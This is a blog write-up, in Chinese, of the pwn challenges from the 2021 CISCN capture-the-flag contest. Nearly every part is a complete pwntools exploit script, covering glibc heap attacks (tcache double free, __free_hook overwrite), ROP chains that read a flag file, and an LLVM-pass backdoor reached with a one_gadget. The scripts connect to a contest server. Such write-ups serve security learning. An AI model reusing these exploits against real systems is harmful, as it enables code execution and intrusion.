2021-CISCN

2021-05-16

字数统计: 3k字 | 阅读时长≈ 17分

2021国赛，就做了5道pwn，还有一道和红帽杯类似的llvm，对这个不太熟悉，学习研究了一下

lonelywolf

一个简单的 2.27的 double-free的tcache攻击，但是这个 2.27是 1.4版本的，有 double-free检测。

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
debug = 1
file_name = './lonelywolf'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'

if debug == 1:
    p = process(file_name)
    #p = process(['./pwny'],env={"LD_PRELOAD":"./libc-2.27.so"})
    #libc = ELF(libc_name)
    libc = ELF(libc_name)
    elf = ELF(file_name)
else:
    p = remote("124.70.61.215",20345)
    libc = ELF('./libc-2.27.so')

def Add(idx, size):
    p.sendlineafter('Your choice: ', str(1))
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(size))

def Edit(idx, payload):
    p.sendlineafter('Your choice: ', str(2))
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Content: ', payload)

def Show(idx):
    p.sendlineafter('Your choice: ', str(3))
    p.sendlineafter('Index: ', str(idx))

def Delete(idx):
    p.sendlineafter('Your choice: ', str(4))
    p.sendlineafter('Index: ', str(idx))

def Pwn():
    Add(0, 0x40)
    Delete(0)
    Add(0, 0x78)
    Delete(0)
    Edit(0, 'a'*0x10)
    Delete(0)
    Show(0)
    p.recvuntil('Content: ')
    heap_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00'))
    heap_base = heap_addr - 0x2b0
    print('heap_addr:',hex(heap_addr),hex(heap_base))
    #gdb.attach(p, 'bp $rebase(0x927)')
    Edit(0, p64(heap_base+0x10))

    Add(0, 0x78)
    Add(0, 0x78)

    payload = p64(0)*4+p16(0)+'\x07'*4
    Edit(0, payload)

    Delete(0)
    Add(0, 0x8)
    Edit(0, 'A'*8)
    Show(0)
    p.recvuntil('A'*8)
    libc_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00'))-0x10-96-libc.sym['__malloc_hook']-0x240
    print('libc_addr:',hex(libc_addr))
    free_hook = libc_addr+libc.sym['__free_hook']
    system_addr = libc_addr+libc.sym['system']

    Edit(0, '\x01'*8)

    Add(0, 0x40)
    Delete(0)
    Edit(0, 'a'*0x10)
    Delete(0)
    Add(0, 0x40)
    Edit(0, p64(free_hook))
    Add(0, 0x40)
    Edit(0, p64(system_addr))
    Add(0, 0x40)
    Edit(0, p64(system_addr))

    Add(0, 0x20)
    payload = '/bin/sh\x00'
    Edit(0, payload)
    Delete(0)
    p.interactive()

Pwn()

Pwny

一个有趣的题，通过下溢使用随机数覆盖 fd，然后 read函数就会返回 0。最后 fd就能被覆盖为 0，以后就能正常输入了。

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
debug = 0
file_name = './pwny'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'

if debug == 1:
    #p = process(file_name)
    p = process(['./pwny'],env={"LD_PRELOAD":"./libc-2.27.so"})
    #libc = ELF(libc_name)
    libc = ELF('./libc-2.27.so')
    elf = ELF(file_name)
else:
    p = remote("124.70.61.215",20442)
    libc = ELF('./libc-2.27.so')

def re(idx):
    p.sendlineafter('Your choice: ', str(1))
    p.sendafter('Index: ', idx)

def wr(idx):
    p.sendlineafter('Your choice: ', str(2))
    p.sendlineafter('Index: ', str(idx))

#gadgets = [0x4f365, 0x4f3c2, 0x10a45c, 0xe58b8, 0xe58c3]
gadgets = [0x4f3d5, 0x4f432, 0x10a41c]
def Pwn():
    #gdb.attach(p, 'bp $rebase(0x8b9)')
    payload = p64(0)
    wr(0x100)
    wr(0x100)
    payload = p64(0xfffffffffffffffc)
    re(payload)
    p.recvuntil('Result: ')
    libc_base = int(p.recvuntil('\n', drop=True),16)-0x3ec680
    print('libc_base:',hex(libc_base))
    malloc_hook = libc_base+libc.sym['__malloc_hook']
    gadget = gadgets[2]+libc_base
    print(hex(gadget))

    payload = p64(0x10000000000000000-0x4b)
    re(payload)
    p.recvuntil('Result: ')
    plt_base = int(p.recvuntil('\n', drop=True),16)-0x298
    print('plt_base:',hex(plt_base))
    lits_addr = plt_base+0x202060
    system_addr = libc_base+libc.sym['system']
    envron = libc_base+libc.symbols['environ']

    payload = p64((envron-lits_addr)/8)
    re(payload)
    p.recvuntil('Result: ')
    stack_addr = int(p.recvuntil('\n', drop=True),16)
    print('stack:',hex(stack_addr))
    main_ret = stack_addr-0x120
    print('ret:',hex(main_ret))
    puts_addr = libc_base+libc.sym['puts']

    #print((main_ret-lits_addr)/8)
    payload = ((main_ret-lits_addr)/8)

    wr(payload)
    p.sendline(p64(gadget))

    #p.sendlineafter('Your choice: ', "0" * 0x400)
    #p.sendlineafter('Your choice: ', "0"*0x400+"/bin/sh")
    p.interactive()

Pwn()

Channel

一个 aarch64架构的，一个 2.31版本的 double-free的攻击。

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
debug = 0
file_name = './channel'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'

if debug == 1:
    #p = process(['./qemu-aarch64-static', '-L', './', '-g', '1234', file_name])
    p = process(['./qemu-aarch64-static', '-L', './', file_name])
    #libc = ELF(libc_name)
    libc = ELF('./libc-2.31.so')
    elf = ELF(file_name)
else:
    p = remote("124.70.61.215",20333)
    libc = ELF('./libc-2.31.so')

def Add(payload):
    p.sendlineafter('> ', str(1))
    p.sendafter('key> ', payload)

def Delete(payload):
    p.sendlineafter('> ', str(2))
    p.sendafter('key> ', payload)

def Red(payload):
    p.sendlineafter('> ', str(3))
    p.sendafter('key> ', payload)

def Wri(payload, size, payload1):
    p.sendlineafter('> ', str(4))
    p.sendafter('key> ', payload)
    p.sendlineafter('len> ', str(size))
    p.sendafter('content> ', payload1)

def Pwn():
    for i in range(10):
        Add(str(i)+'a'*0xff)

    for i in range(6):
        Delete(str(i+4)+'a'*0xff)
    Delete('0'+'a'*0xff)
    #gdb.attach(p, 'bp $rebase(0x13b0)')
    Delete('1'+'a'*0xff)
    Wri('2'+'a'*0xff, 0x8, 'a'*8)
    Red('2'+'a'*0xff)
    p.recvuntil('a'*8)
    libc_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00'))+0x4000000000-0x110
    libc_base = libc_addr-0x16dac0#-0x10-96-libc.sym['__malloc_hook']
    print(hex(libc.sym['__malloc_hook']+96+0x10))
    print('libc_addr:',hex(libc_addr),hex(libc_base))
    free_hook = libc.sym['__free_hook']+libc_base
    print('free_hook:',hex(free_hook))
    system_addr = libc_base+libc.sym['system']
    print(hex(libc.symbols['environ']))

    #double free
    #Add('2'+'a'*0xff)
    Delete('2'+'a'*0xff)
    print('alloc')
    Add('/bin/sh\x00'+'a'*0xf8)
    Delete('2'+'a'*0xff)

    payload ='b'+'a'*0xcf+p64(0)+p64(0x120)+p64(free_hook)
    Wri('/bin/sh\x00'+'a'*0xf8, 0x100, payload)

    Add(p64(system_addr))
    Add(p64(system_addr))
    Delete('/bin/sh\x00'+'a'*0xf8)
    p.interactive()

Pwn()

SilverWolf

就是第一题加了一个沙箱，唯一难受的是 size太小了，布置 rop有点难。所以得先执行一次 read的 rop，读取orw到 free_hook后面。

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
debug = 1
file_name = './silverwolf'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'

if debug == 1:
    p = process(file_name)
    #p = process(['./pwny'],env={"LD_PRELOAD":"./libc-2.27.so"})
    #libc = ELF(libc_name)
    libc = ELF(libc_name)
    elf = ELF(file_name)
else:
    p = remote("124.70.61.215",20345)
    libc = ELF('./libc-2.27.so')

def Add(idx, size):
    p.sendlineafter('Your choice: ', str(1))
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(size))

def Edit(idx, payload):
    p.sendlineafter('Your choice: ', str(2))
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Content: ', payload)

def Show(idx):
    p.sendlineafter('Your choice: ', str(3))
    p.sendlineafter('Index: ', str(idx))

def Delete(idx):
    p.sendlineafter('Your choice: ', str(4))
    p.sendlineafter('Index: ', str(idx))

def Pwn():
    # gdb.attach(p, 'bp $rebase(0xad7)')
    for i in range(7):
        Add(0, 0x10)
    Add(0, 0x40)
    Delete(0)
    Add(0, 0x78)
    Delete(0)
    # Edit(0, 'a' * 0x10)
    # Delete(0)

    Show(0)
    p.recvuntil('Content: ')
    heap_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00'))
    heap_base = heap_addr - 0x11b0
    print('heap_addr:', hex(heap_addr), hex(heap_base))
    # gdb.attach(p, 'bp $rebase(0x927)')
    Edit(0, p64(heap_base + 0x16a0))

    Add(0, 0x78)
    Add(0, 0x78)
    # gdb.attach(p, 'bp $rebase(0x927)')
    print("alloc tacahe struct")
    payload = p64(0)+p32(0)+'\x00'+'\x07'
    Edit(0, payload)

    for i in range(6):
        payload = "a"*0x10
        Edit(0, payload)
        Delete(0)

    for i in range(5):
        Add(0, 0x10)
    # gdb.attach(p, 'bp $rebase(0xad7)')
    Add(0, 0x8)
    Edit(0, 'A' * 8)
    Show(0)
    p.recvuntil('A' * 8)
    libc_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00')) -0x3ebd80#- 0x10 - 96 - libc.sym['__malloc_hook'] - 0x240
    print('libc_addr:', hex(libc_addr))
    free_hook = libc_addr + libc.sym['__free_hook']
    system_addr = libc_addr + libc.sym['system']
    setcontext = libc_addr + libc.sym['setcontext']
    print("secontext:",hex(setcontext))

    Edit(0, '\x01' * 8)
    # gdb.attach(p, 'bp $rebase(0x927)')

    read_addr = libc_addr + libc.sym['read']
    open_addr = libc_addr + libc.sym['open']
    write_addr = libc_addr + libc.sym['write']
    setcontext = libc_addr + libc.sym['setcontext']
    pop_rdi_ret = libc_addr + 0x215bf
    pop_rsi_ret = libc_addr + 0x23eea
    pop_rdx_ret = libc_addr + 0x1b96
    pop_rax_ret = libc_addr + 0x43ae8
    syscall = libc_addr + 0xd2745
    ret = libc_addr + 0xc0c9d

    Add(0, 0x40)
    Delete(0)
    Edit(0, 'a' * 0x10)
    Delete(0)
    Add(0, 0x40)
    Edit(0, p64(free_hook+0xa0))
    Add(0, 0x40)
    Edit(0, p64(system_addr))
    print("free_hook+0xa8")
    Add(0, 0x40)
    payload = p64(free_hook+0xa0)+p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_ret)+p64(free_hook+0xe0)+p64(pop_rdx_ret)+p64(0x200)+p64(read_addr)
    Edit(0, payload)

    flag_str_addr = free_hook+0x8
    flag_addr = heap_base+0x20

    rop = flat([
        pop_rax_ret, 2,
        pop_rdi_ret, flag_str_addr,
        pop_rsi_ret, 0,
        # pop_rdx_ret, 0,
        syscall,
        pop_rdi_ret, 3,
        pop_rsi_ret, flag_addr,
        pop_rdx_ret, 0x30,
        read_addr,
        pop_rdi_ret, 1,
        pop_rsi_ret, flag_addr,
        pop_rdx_ret, 0x30,
        write_addr
    ])

    #gdb.attach(p, 'bp $rebase(0xad7)')
    Add(0, 0x50)
    Delete(0)
    Edit(0, 'a' * 0x10)
    Delete(0)
    Add(0, 0x50)
    Edit(0, p64(free_hook))
    Add(0, 0x50)
    Edit(0, p64(system_addr))
    Add(0, 0x50)
    Edit(0, p64(setcontext+53)+"./flag")

    Delete(0)
    p.sendline(rop)
    p.interactive()

Pwn()

game

和之前虎符线上的 vm很像，不过这道题更简单，没有边界检查，又是 x86架构。唯一的是通过修改 size，实现堆重叠，劫持 free_hook，最后执行 orw。

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
debug = 0
file_name = './game'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'

if debug == 1:
    p = process(file_name)
    #p = process(['./pwny'],env={"LD_PRELOAD":"./libc-2.27.so"})
    #libc = ELF(libc_name)
    libc = ELF(libc_name)
    elf = ELF(file_name)
else:
    p = remote("124.70.61.215",20345)
    libc = ELF('./libc-2.27.so')

def Cmap(l, w):
    payload = "op:"+'1\n'+"l:"+l+"\n"+"w:"+w
    return payload

def Ccar(id, size):
    payload = "op:"+"2\n"+"id:"+id+"\ns:"+size
    return payload

def Dcar(id):
    payload = "op:"+"3\n"+"id:"+id
    return payload

def Show():
    return "op:"+"4\n"

def goleft(id):
    return "op:"+"5\n"+"id:"+id

def goright(id):
    return "op:"+"6\n"+"id:"+id

def godown(id):
    return "op:"+"7\n"+"id:"+id

def goup(id):
    return "op:"+"8\n"+"id:"+id

def Pwn():
    payload = b""
    payload += Cmap('15', '8')+"\n"
    #gdb.attach(p, 'bp $rebase(0x1cd4)')
    p.sendlineafter('cmd> ', payload)

    payload = Ccar('9', '16')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = '1'*0x1
    p.sendafter('desc> ', desc)

    payload = Show()+"\n"
    p.sendlineafter('cmd> ', payload)
    p.recvuntil('9: (7,3) ')
    heap_base = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00'))-0x2131
    print("heap_base:",hex(heap_base))


    payload = b""
    payload += Ccar('1', '1056')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = '1'*0x10
    p.sendafter('desc> ', desc)

    payload = b""
    payload += Ccar('2', '1056')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = '2'*0x8
    p.sendafter('desc> ', desc)

    payload = Dcar('1')+"\n"
    p.sendlineafter('cmd> ', payload)

    payload = b""
    payload += Ccar('1', '1056')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = '1'*0x8
    p.sendafter('desc> ', desc)

    payload = Show()+"\n"
    p.sendlineafter('cmd> ', payload)
    p.recvuntil('1'*8)
    libc_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00'))-0x10-96-libc.sym['__malloc_hook']
    print("libc_addr:",hex(libc_addr))
    free_hook = libc_addr+libc.sym['__free_hook']
    system_addr = libc_addr+libc.sym['system']
    print("system_addr:",hex(system_addr))
    setcontext = libc.sym['setcontext']

    pop_rdi_ret = libc_addr+0x215bf
    pop_rsi_ret = libc_addr+0x23eea
    pop_rdx_ret = libc_addr+0x1b96
    pop_rax_ret = libc_addr+0x43ae8
    syscall = libc_addr+0xd2745
    flag_str_addr = free_hook+0x10
    flag_addr = free_hook+0x30
    read_addr = libc_addr+libc.sym['read']
    open_addr = libc_addr+libc.sym['open']
    write_addr = libc_addr+libc.sym['write']
    setcontext = libc_addr+libc.sym['setcontext']

    rop = flat([
        pop_rax_ret, 2,
        pop_rdi_ret, flag_str_addr,
        pop_rsi_ret, 0,
        syscall,
        pop_rdi_ret, 3,
        pop_rsi_ret, flag_addr,
        pop_rdx_ret, 0x30,
        read_addr,
        pop_rdi_ret, 1,
        pop_rsi_ret, flag_addr,
        pop_rdx_ret, 0x30,
        write_addr
    ])

    print("leak rop:")
    payload = b""
    payload += Ccar('10', '1056')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = rop
    p.sendafter('desc> ', desc)


    payload = b""
    payload += Ccar('177', '256')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = (p64(0)+p64(0))*0xa+p64(heap_base+0x2a90+8)+p64(pop_rax_ret)
    p.sendafter('desc> ', desc)

    payload = Show()+"\n"
    p.sendlineafter('cmd> ', payload)
    p.recvuntil('177: (')
    r_pos = int(p.recvuntil(',', drop=True))
    l_pos = int(p.recvuntil(')', drop=True))
    print("r_pos:",hex(r_pos),hex(l_pos))

    #8:0x10 9:8
    #gdb.attach(p, 'bp $rebase(0x1cd4)')
    print("cover size")

    for i in range(r_pos):
        payload = godown('177') + '\n'
        p.sendlineafter('cmd> ', payload)

    addl_num = 0x13-l_pos
    for i in range(addl_num):
        payload = goright('177') + '\n'
        p.sendlineafter('cmd> ', payload)

    print("alloc change sized chunk")
    payload = b""
    payload += Ccar('4', '120')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = '4'*0x8
    p.sendafter('desc> ', desc)

    #free 0xb0
    payload = Dcar('4')+"\n"
    p.sendlineafter('cmd> ', payload)

    print("alloc fake chunk0xb0")
    #alloc 0xb0, cover 0xdda30
    payload = b""
    payload += Ccar('5', '168')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = 'a'*0x90+p64(0)+p64(0x70)+p64(free_hook)
    p.sendafter('desc> ', desc)

    #0x70 1
    payload = b""
    payload += Ccar('6', '104')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = p64(setcontext+53)
    p.sendafter('desc> ', desc)

    #0x70 2
    payload = b""
    payload += Ccar('7', '104')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = p64(setcontext+53)
    p.sendafter('desc> ', desc)

    #free_hook
    payload = b""
    payload += Ccar('8', '104')+"\n"
    p.sendlineafter('cmd> ', payload)
    desc = p64(setcontext+53)+p64(0)+'./flag'
    p.sendafter('desc> ', desc)

    gdb.attach(p, 'bp $rebase(0x1cd4)')
    payload = Dcar('177')+"\n"
    p.sendlineafter('cmd> ', payload)

    p.interactive()

Pwn()

SATool

程序分析

按照红帽杯的分析思路，找到 runOnFunction函数，然后其中有各个函数处理。这里首先需要处理的函数名为 B4ckDo0r，然后各个函数处理如下（这里部分函数功能是我根据调试猜测的，并不一定准确 : (

if ( !(unsigned int)std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::compare(
                      &funcname,
                      "save") )
{
	          v19 = llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - 24));
  v20 = v8 - 24LL * (*(_DWORD *)(v8 + 20) & 0xFFFFFFF);
  if ( -1431655765 * (unsigned int)((v15 + 24 * v18 - 24 * (unsigned __int64)v19 - v20) >> 3) == 2 )//需要两个参数
      
      ...
      
    chunk = (chunk_pts *)malloc(0x18uLL);	//申请0x18的堆大小
    chunk->netx_pt = (__int64)chunk_pt;
    chunk_pt = &chunk->field_0;	//将chunk[0]赋值给 chunk_pt
    v33 = (char *)src;
    memcpy(chunk, src, size);
    v34 = &chunk->field_8;
    v35 = func_s[0];
    memcpy(v34, func_s[0], (size_t)func_s[1]);
    if ( v35 != (func_struct *)&v85 )
    {
      operator delete(v35);
      v33 = (char *)src;
    }
    if ( v33 != v88 )
      operator delete(v33);
  }
}

save函数需要两个参数，然后会申请 0x18的堆块，并且把 chunk的地址复制给 chunk_pt变量。然后复制数据。

if ( (unsigned int)std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::compare(
                     &funcname,
                     "takeaway") )
  goto LABEL_99;
  ...
v39 = llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - 24));
v40 = v8 - 24LL * (*(_DWORD *)(v8 + 20) & 0xFFFFFFF);
if ( -1431655765 * (unsigned int)((v15 + 24 * v38 - 24 * (unsigned __int64)v39 - v40) >> 3) != 1 )//需要一个参数

...
 	else
   	{
      chunk_pt = (_QWORD *)chunk_pt[2];	//获取下一个chunk
    }
    free(chunk_1);	//将当前chunk释放
  }

takeaway需要1个参数，可以将当前 chunk_pt链表中的第一个 chunk删掉，并转入下一个 chunk

if ( !(unsigned int)std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::compare(
                      &funcname,
                      "stealkey") )
{
    ...
        
  {
    chunk_pt2 = *chunk_pt;
  }

stealkey不需要参数，可以将当前 chunk_pt链表的第一个chunk的值赋值给 chunk_pt2变量

if ( !(unsigned int)std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::compare(
                      &funcname,
                      "fakekey") )
{
    ...
                  chunk_pt22 = chunk_pt2;
      if ( *(_BYTE *)(*(_QWORD *)v75 + 16LL) == 13 )
        value = llvm::APInt::getSExtValue((llvm::APInt *)(*(_QWORD *)v75 + 24LL));
      else
        value = 0LL;
      chunk_pt2 = chunk_pt22 + value;
      *chunk_pt = chunk_pt22 + value;
    }

fakekey需要一个参数，会根据输入的参数 value加上 chunk_pt2的值，分别赋值给 chunk_pt2和 chunk_pt。

if ( !(unsigned int)std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::compare(
                      &funcname,
                      "run") )
{
((void (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))*chunk_pt)()
...

run函数不需要参数，会执行 chunk_pt指针。

利用分析

这里 run函数中明显存在一个虚函数指针执行。所以可以考虑将 onegadget布置到 chunk_pt指针处，然后去执行 run即可。

这里肯定需要利用 fakekey来实现将 chunk_pt指针的值修改为 onegagdet地址，因为这里可以加上我们自己输入的一个数。

那么，就首先需要考虑在 chunk_pt2处留下 libc的地址。

而前面，有一个 save函数，可以申请堆块。如果能够申请到 unsortedbin中的堆块，就能在chunk的前8字节留下 libc地址。然后再通过 takeaway函数，将 chunk_pt的libc地址赋值给 chunk_pt2。

最后利用 fakekey，加上输入的偏移，使得 chunk_pt为 onegadget即可。

EXP

//./clang+llvm-12.0.0-x86_64-linux-gnu-ubuntu-16.04/bin/clang -emit-llvm -c exp.c -o exp.bc

void save(int a, int b);
void stealkey();
void fakekey(int a);
void run();

void B4ckDo0r()
{
	for(int i=0; i<7; i++){
        save(0, 0);
    }
	stealkey();
	fakekey(0xffc63792);
	run();
}

本文作者： A1ex
本文链接： http://yoursite.com/2021/05/16/2021-CISCN/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！